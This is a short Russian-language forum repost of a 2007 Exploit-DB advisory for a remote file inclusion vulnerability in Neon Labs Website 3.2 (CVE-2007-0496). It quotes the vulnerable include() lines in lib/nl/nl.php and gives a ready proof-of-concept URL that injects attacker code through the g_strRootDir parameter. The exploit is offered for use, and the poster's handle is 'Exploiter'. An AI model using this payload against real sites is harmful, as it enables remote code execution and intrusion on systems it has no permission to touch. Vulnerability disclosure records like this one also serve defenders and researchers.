Exploit Neon Labs Website 3.2 - 'nl.php?g_strRootDir' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3163
Проверка EDB
  1. Пройдено
Автор
3L3CTRIC-CRACKER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-0496
Дата публикации
2007-01-20
Код:
------------------------------------------------------------------------------------------------------------------------
Script:nlws
Affected Version:3.2
Downlaoad:http://neonlabs.structum.com.mx/pkgs/nlws_3-2.zip
------------------------------------------------------------------------------------------------------------------------
Author:Dr Max Virus
------------------------------------------------------------------------------------------------------------------------
Bug in (lib/nl/nl.php)
Vul Code;
include($g_strRootDir.$g_strLibDir."nl/nlsite.php");
include($g_strRootDir.$g_strLibDir."nl/nltable.php");
------------------------------------------------------------------------------------------------------------------------
POC:
http://[target]/[path]/lib/nl/nl.php?g_strRootDir=[Bad Code]
------------------------------------------------------------------------------------------------------------------------
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2007-01-20]
 
Источник
www.exploit-db.com

Похожие темы